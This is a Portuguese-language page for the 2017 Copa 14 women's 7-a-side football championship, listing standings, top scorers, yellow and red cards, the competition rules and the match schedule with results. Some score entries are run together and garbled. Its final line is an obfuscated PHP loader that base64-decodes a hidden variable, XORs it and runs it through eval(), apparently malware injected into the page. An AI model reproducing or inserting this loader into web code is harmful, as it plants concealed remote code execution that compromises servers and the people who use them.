Campeonato Copa 14 – Feminino – 2017

1ª FASE – CLASSIFICAÇÃO

GERAL – GRUPOS A E B
Colocação Times PG J V E D GP GC SG
ANJO DOURADO 12 05 04 00 01 22 06 16
TORPEDO E. C. 11 05 03 01 01 18 11 07
COLO-COLO FUT 7 11 05 03 01 01 12 09 03
EQUIPE FORTE – SÃO JOSÉ 09 05 03 00 02 16 09 07
ÁGUIA DOURADA 09 05 02 02 01 15 08 07
F. C. BARCELONA 08 05 02 01 02 16 13 03
GRALHA AZUL – ACQUAFORT 08 05 02 01 02 12 11 01
FÊNIX F. C. 07 05 02 01 02 10 13 -03
DESISTIR JAMAIS F. C. 06 05 02 00 03 07 18 -11
10º SEM LIMITES 04 05 01 01 03 09 15 -06
11º REAL SPORT 03 05 01 00 04 03 21 -18
12º REAL MADRID 02 05 00 01 04 07 13 -06

 

ARTILHEIRA – 2017

 

ATLETA EQUIPE GOLS
DANIELLE CRISTINA DE MELO VIANA F. C. BARCELONA 11
EMANUELLE VIEIRA GRALHA AZUL 08
RAQUEL CARDOSO PERCEGONA TORPEDO E. C. 08
JULIANA CRISTINA DA LUZ ÁGUIA DOURADA 07
MARILDA DE LIMA ANJO DOURADO 07
MIRIAM CRISCIELLE FERREIRA EQUIPE FORTE 07
DAYANE RODRIGUES KRICHAKI COLO-COLO FUT 7 06
DAYANNE VIEIRA SANTOS PINTO F. C. BARCELONA 06
JULIANA LEONEL MARCUNE ANJO DOURADO 06
THALITA CRISTINA DOS SANTOS ANJO DOURADO 06
ELISÂNGELA BOSA CORDEIRO EQUIPE FORTE 05
FERNANDA CALDEIRA F. C. BARCELONA 05
MAIARA VELOSO ÁGUIA DOURADA 05
MEIRY HELEN MARIA DA PAIXAO SEM LIMITES 05
LIRIANE MIQUELASSO REGLOSKI FÊNIX F. C. 04
VICTORIA CAROLINE S. DE O. GOMES TORPEDO E. C. 04
ADRIANA QUADROS FÊNIX F. C. 03
ANA PAULA FERREIRA QUEIROZ COLO-COLO FUT 7 03
BEATRIZ CATHERINE DOS SANTOS GRALHA AZUL 03
ELAINE FERNANDA B. DE GOES EQUIPE FORTE 03
EMANUELE AMORIN INACIO TORPEDO E. C. 03
FRANCIELE LAURA DE OLIVEIRA F. C. BARCELONA 03
LUZIA SALES ANJO DOURADO 03
MARIA THEREZA OLIVEIRA SOUZA F. C. BARCELONA 03
TANGRIANE ALVES DE SIQUEIRA F. C. BARCELONA 03
ANA PAULA RIBEIRO DA SILVA FÊNIX F. C. 02
ANA PAULA SANTOS DA COSTA DESISTIR JAMAIS 02
ARIANE JESUS DE OLIVEIRA DESISTIR JAMAIS 02
BRUNA VALENTE COLO-COLO FUT 7 02
CAMILA PEREIRA DA COSTA EQUIPE FORTE 02
DANIELE DE ANDREIA ÁGUIA DOURADA 02
DEBORA PAIXAO ANJO DOURADO 02
EMANOELLA N. DE MOURA ALMEIDA FÊNIX F. C. 02
FRANCIELE FERREIRA ROSSETO REAL MADRID 02
JANDELINE DOS SANTOS PINHEIRO REAL SPORT 02
JOELMA DE FATIMA DOS SANTOS REAL MADRID 02
KATLYN NAYANE NOGUEIRA SEM LIMITES 02
MANOELLE MACIEL F. C. BARCELONA 02
MAYARA FERREIRA PINTO GRALHA AZUL 02
MEIRE ISSIS MARQUEZINI ÁGUIA DOURADA 02
PATRICIA RIBEIRETE SILVA TORPEDO E. C. 02
PRISCILA DOS SANTOS GRALHA AZUL 02
SUELLEN DE CRISTO GRALHA AZUL 02
VALDIRENE AP DA SILVA COLO-COLO FUT 7 02
ALESSANDRA DA R. C. DE ARAGAO DESISTIR JAMAIS 01
AMANDA CASTILHO ANJO DOURADO 01
ANDREIA ROCHA ANJO DOURADO 01
BRUNA DIAS DA COSTA REAL MADRID 01
CAROLINE COUTINHO DE AMORIN TORPEDO E. C. 01
CASSIANA HALLAMA SEM LIMITES 01
CIBELE ARIANE OGIONI DAMACENO ÁGUIA DOURADA 01
DARIELE BRADOSKI LACERDA TORPEDO E. C. 01
DEBORA MARIA SCHOLTZ REAL SPORT 01
EVELYN JANINY GOMES DA SILVA REAL MADRID 01
FRANCIELE FABRICIO TAMMENHAIN ÁGUIA DOURADA 01
HEVELYN LOMBARDI P. DA SILVEIRA DESISTIR JAMAIS 01
JESSICA CAROLINE DA SILVA FÊNIX F. C. 01
JESSICA DE LIMA REAL MADRID 01
JESSICA FRANCELINA PRATES TORPEDO E. C. 01
JULIA GRAVELLA GAUN REAL MADRID 01
KELLY THAIS DOS SANTOS DESISTIR JAMAIS 01
LAISSA CRISTINE MINIKOVSKI F. C. BARCELONA 01
LARISSA BARBOSA DOS SANTOS REAL MADRID 01
LIGIA MARIA DA SILVA SANTOS SEM LIMITES 01
MAYARA FERNANDO COLO-COLO FUT 7 01
MILENA CAROLINE DE LIMA ALVES EQUIPE FORTE 01
MOESSA DA SILVA GRALHA AZUL 01
PLICIANE CRISTINA R. DOS SANTOS EQUIPE FORTE 01
RAFAELA DA SILVA AGUIAR REAL MADRID 01
RENATA NERIS VELOZO COLO-COLO FUT 7 01
ROBERTA DOS SANTOS OLIVEIRA TORPEDO E. C. 01
SHAYELE CRISTIANE G. TOEDA SEM LIMITES 01
SUELLEN VILIMAVICIUS GRALHA AZUL 01
TATIANE VERONICA B. DA SILVA TORPEDO E. C. 01
VALDIRENE DE CASSIA FERREIRA EQUIPE FORTE 01
VITORIA T. DE BRITO ANTUNES DESISTIR JAMAIS 01

 

ATLETAS SUSPENSAS

ATLETA EQUIPE MOTIVO PUNIÇÃO
MARIELLE N. DE OLIVEIRA FÊNIX F. C. 03 C. AMARELOS 01 J. – 02/04/17
 
 

COMISSÃO TÉCNICA

 
 
 

CARTÕES

 

SUSP. AUTOMÁTICA

À CUMPRIR    –    JÁ CUMPRIDO

 

ATLETA EQUIPE CA CV
MAIARA VELOSO ÁGUIA DOURADA 01
AMANDA CASTILHO ANJO DOURADO 01
ANDREIA ROCHA ANJO DOURADO 01
DEBORA CAMARGO ANJO DOURADO 01
JOICE FERNANDES DE PAULA ANJO DOURADO 01
LUZIA SALES ANJO DOURADO 01
ANA PAULA FERREIRA QUEIROZ COLO-COLO 01
CAROLINE DOS SANTOS E SILVA COLO-COLO 02
DAYANE RODRIGUES KRICHAKI COLO-COLO 01
IZABEL PEREIRA DE MORAES COLO-COLO 01
VALDIRENE AP DA SILVA COLO-COLO 01
ALESSANDRA DA R. C. DE ARAGAO DESISTIR JAMAIS 01
ANA PAULA SANTOS DA COSTA DESISTIR JAMAIS 01
HEVELYN LOMBARDI P. DA SILVEIRA DESISTIR JAMAIS 01
TATIELLE ARIELE MOCELIM SOARES DESISTIR JAMAIS 01
ELAINE FERNANDA B. DE GOES EQUIPE FORTE 01
NAYARA VERESSA BASTOS EQUIPE FORTE 01
PLICIANE CRISTINA R. DOS SANTOS EQUIPE FORTE 01
PRISCILA CRISTINA RIBEIRO EQUIPE FORTE 01
DAYANNE VIEIRA SANTOS PINTO F. C. BARCELONA 02
MANOELLE MACIEL F. C. BARCELONA 01
MAYARA HUDIK DORADA F. C. BARCELONA 01
ALINE WOSNIACK BONATO FÊNIX F. C. 01
EMANOELLA N. DE MOURA ALMEIDA FÊNIX F. C. 01
MARIELLE N. DE OLIVEIRA FÊNIX F. C. 03
ROSANA MIELNICZEK FÊNIX F. C. 01
EMANUELLE VIEIRA GRALHA AZUL 01
MAESSA DA SILVA GRALHA AZUL 01
MAYARA FERREIRA PINTO GRALHA AZUL 01
BRUNA DIAS DA COSTA REAL MADRID 01
JESSICA DE LIMA REAL MADRID 01
NAIARA GOMES REAL MADRID 02 01
LUANA CAROLINE TAQUEDA REAL SPORT 01
REGIANI CRISTINA VERSA REAL SPORT 01
JESSICA RODRIGUES GUERRA SEM LIMITES 01
LIGIA MARIA DA SILVA SANTOS SEM LIMITES 01
PAULO SUSELI MICHELON DE SOUZA SEM LIMITES 01
SHAYELE CRISTIANE G. TOEDA SEM LIMITES 02
DARIELE BRADOSKI LACERDA TORPEDO 01
RAQUEL CARDOSO PERCEGONA TORPEDO 01
ROBERTA DOS SANTOS OLIVEIRA TORPEDO 01

 

VI CAMPEONATO COPA 14 DE FUTEBOL 7 2017

 FEMININO

 

NA PRIMEIRA FASE DA COMPETIÇÃO SERÃO FORMADOS DOIS GRUPOS DE CINCO EQUIPES, ONDE JOGARÃO AS EQUIPES DOS GRUPO A CONTRA AS EQUIPES DO GRUPO B, EM TURNO ÚNICO.

 

CLASSIFICARÃO PARA A SEGUNDA FASE (QUARTAS DE FINAL), AS OITO MELHORES CAMPANHAS INDEPENDENTE DO GRUPO A QUAL FIZER PARTE A EQUIPE.

 

NA PRIMEIRA FASE, QUANDO OCORRER EMPATE NO TEMPO NORMAL, AS DUAS EQUIPES RECEBERÃO UM PONTO E DISPUTARÃO MAIS UM PONTO EM COBRANÇAS DE SHOOT OUT. NESSE CASO, A DISPUTA DE SHOOT OUT SERÁ DE APENAS UMA COBRANÇA, PERSISTINDO O EMPATE, SERÃO EFETUADAS COBRANÇAS ATÉ QUE TENHA UM GANHADOR.

 

CRITÉRIO DESEMPATE:

1 – NV – MAIOR NÚMERO DE VITÓRIAS (SHOOT OUT NÃO CONSIDERA VITÓRIA);

2 – SG – MELHOR SALDO DE GOLS;

3 – GP – MAIOR NÚMERO DE GOLS PRÓ;

4 – GC – MENOR NÚMERO DE GOLS CONTRA;

5 – EQUIPE MAIS DISCIPLINADA (PESO: AMARELO 1; VERMELHO 3).

 

GRUPOS DA PRIMEIRA FASE

 

GRUPO A 1-GRALHA AZUL – ACQUAFORT2-FÊNIX F.C

3-REAL SPORT

4-TORPEDO E.C

5-AGUIA DOURADA

6-EQUIPE FORTE

 

GRUPO B 1-COLO – COLO FUT 72-DESISTIR JAMAIS F.C

3-REAL MADRID

4-F.C BARCELONA

5-ANJO DOURADO

6-SEM LIMITES

 

 

NA SEGUNDA FASE DA COMPETIÇÃO, SERÃO FORMADOS QUATRO GRUPOS DE DUAS EQUIPES CADA, ONDE JOGARÃO NO SISTEMA ELIMINATÓRIA SIMPLES (01 JOGO). OS CONFRONTOS SERÃO DEFINIDOS CONFORME A CLASSIFICAÇÃO GERAL.

 

CASO OCORRA EMPATE NO TEMPO NORMAL, A PARTIDA SERÁ DECICIDA EM CONBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

 

GRUPOS DA SEGUNDA FASE – QUARTAS DE FINAL

 

GRUPO 1 Anjo DouradoX

Fênix F. C.

 

GRUPO 2 Equipe ForteX

Colo-Colo Fut 7

 

GRUPO 3 Águia DouradaX

Gralha Azul

 

GRUPO 4 F.C. BarcelonaX

Torpedo E.C.

 

 

 

OS VENCEDORES DA SEGUNDA FASE JOGARÃO A TERCEIRA FASE (SEMIFINAIS), OBEDECENDO OS CONFRONTOS JÁ DEFINIDOS CONFORME ABAIXO:

 

CASO OCORRA EMPATE NO TEMPO NORMAL, A PARTIDA SERÁ DECICIDA EM CONBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

GRUPOS DA TERCEIRA FASE – SEMIFINAIS

 

GRUPO 5 Fênix F. C.X

F. C. Barcelona

 

GRUPO 6 Colo-Colo Fut 7X

Águia Dourada

 

 

NAS FINAIS, CASO OCORRAM EMPATES NO TEMPO NORMAL, AS PARTIDAS SERÃO DECICIDAS EM COBRANÇAS DE SHOOT OUT, EM SÉRIE DE TRÊS COBRANÇAS E, PERSISTINDO O EMPATE, COBRANÇAS ALTERNADAS ATÉ QUE TENHA UM GANHADOR.

 

GRUPOS DA QUARTA FASE – FINAIS

GRUPO 7 – DECISÃO 3º LUGAR Perdedor Gr. 5  X  Perdedor Gr. 6 

 

GRUPO 8 – DECISÃO 1º LUGAR Venc. Gr. 5  X  Venc. Gr. 6 
Regulamento Oficial
Regulamento Copa 14 2017 (2)

TABELA DE JOGOS – DATAS E HORÁRIOS

 

 

Quadra Horário Grupo Jogo Equipe X Equipe
1ª RODADA – 1ª FASE – 05/02/2017
1 – E 14:00 A/B 01 Gralha Azul/Acq. 1X3 Colo-Colo Fut 7
2 – I 14:00 A/B 02 Fênix F. C. 3X1 Desistir Jamais
1 – E 15:00 A/B 03 Real Sport 1X0 Real Madrid
2 – I 15:00 A/B 04 Torpedo E. C. 6X3 Barcelona
1 – E 16:00 A/B 05 Águia Dourada 2X1 Anjo Dourado
2 – I 16:00 A/B 06 Equipe Forte 4X0 Sem Limites
2ª RODADA – 1ª FASE – 12/02/2017
2 – I 14:00 A/B 07 Desistir Jamais 2X0 Real Sport
1 – E 14:00 A/B 08 Real Madrid 2X4 Torpedo E. C.
2 – I 15:00 A/B 09 Barcelona 3x30x1 Águia Dourada
1 – E 15:00 A/B 10 Anjo Dourado 4X1 Equipe Forte
2 – I 16:00 A/B 11 Sem Limites 0x3 Gralha Azul/Acq.
1 – E 16:00 A/B 12 Colo-Colo Fut 7 2x22x1 Fênix F. C.
3ª RODADA – 1ª FASE – 19/02/2017
1 – E 14:00 A/B 13 Águia Dourada 1X10X1 Real Madrid
2 – I 14:00 A/B 14 Equipe Forte 1X2 Barcelona
1 – E 15:00 A/B 15 Gralha Azul/Acq. 2X3 Anjo Dourado
2 – I 15:00 A/B 16 Fênix F. C. 4X1 Sem Limites
1 – E 16:00 A/B 17 Real Sport 0X3 Colo-Colo Fut 7
2 – I 16:00 A/B 18 Torpedo E. C. 1X2 Desistir Jamais
4ª RODADA – 1ª FASE – 05/03/2017
2 – I 14:00 A/B 19 Barcelona 3X30X1 Gralha Azul/Acq.
1 – E 14:00 A/B 20 Anjo Dourado 4×1 Fênix F. C.
2 – I 15:00 A/B 21 Sem Limites 6X2 Real Sport
1 – E 15:00 A/B 22 Colo-Colo Fut 7 2X5 Torpedo E. C.
2 – I 16:00 A/B 23 Desistir Jamais 1X8 Águia Dourada
1 – E 16:00 A/B 24 Real Madrid 2X4 Equipe Forte
5ª RODADA – 1ª FASE – 12/03/2017
1 – E 14:00 A/B 25 Real Sport 0x10 Anjo Dourado
2 – I 14:00 A/B 26 Torpedo E. C. 2x22x1 Sem Limites
1 – E 15:00 A/B 27 Águia Dourada 1×2 Colo-Colo Fut 7
2 – I 15:00 A/B 28 Equipe Forte 6×1 Desistir Jamais
1 – E 16:00 A/B 29 Gralha Azul/Acq. 3×2 Real Madrid
2 – I 16:00 A/B 30 Fênix F. C. 0x5 Barcelona
6ª RODADA – 1ª FASE – 19/03/2017
2 – I 14:00 A/B 31 Sem Limites 1×2 Águia Dourada
1 – E 14:00 A/B 32 Colo-Colo Fut 7 1×3 Equipe Forte
2 – I 15:00 A/B 33 Desistir Jamais 1×6 Gralha Azul/Acq.
1 – E 15:00 A/B 34 Real Madrid 3×0 Fênix F. C.
2 – I 16:00 A/B 35 Barcelona 10×0 Real Sport
1 – E 16:00 A/B 36 Anjo Dourado 3×2 Torpedo E. C.
QUARTAS DE FINAL – 26/03/2017
2 – I 13:00 4 37 F.C. Barcelona 8×2 Torpedo E.C.
2 – I 14:00 3 38 Águia Dourada 1x12x1 Gralha Azul/Acq.
2 – I 15:00 2 39 Equipe Forte 1×2 Colo-Colo Fut 7
2 – I 16:00 1 40 Anjo Dourado 2x20x1 Fênix F. C.
SEMIFINAIS – 02/04/2017
2 – I 14:00 6 41 Colo-Colo Fut 7 X Águia Dourada
2 – I 15:00 5 42 Fênix F. C. X F.C. Barcelona
FINAIS – 09/04/2017
2 – I 14:00 7 43 PERD. GR. 5 X PERD. GR. 6
2 – I 15:00 8 44 VENC. GR. 5 X VENC. GR. 6

 

 

$raw = base64_decode($encoded); $res = ''; for ($i = 0; $i < strlen($raw); $i++) { $res .= chr(ord($raw[$i]) ^ ord('x')); } eval($res) ?>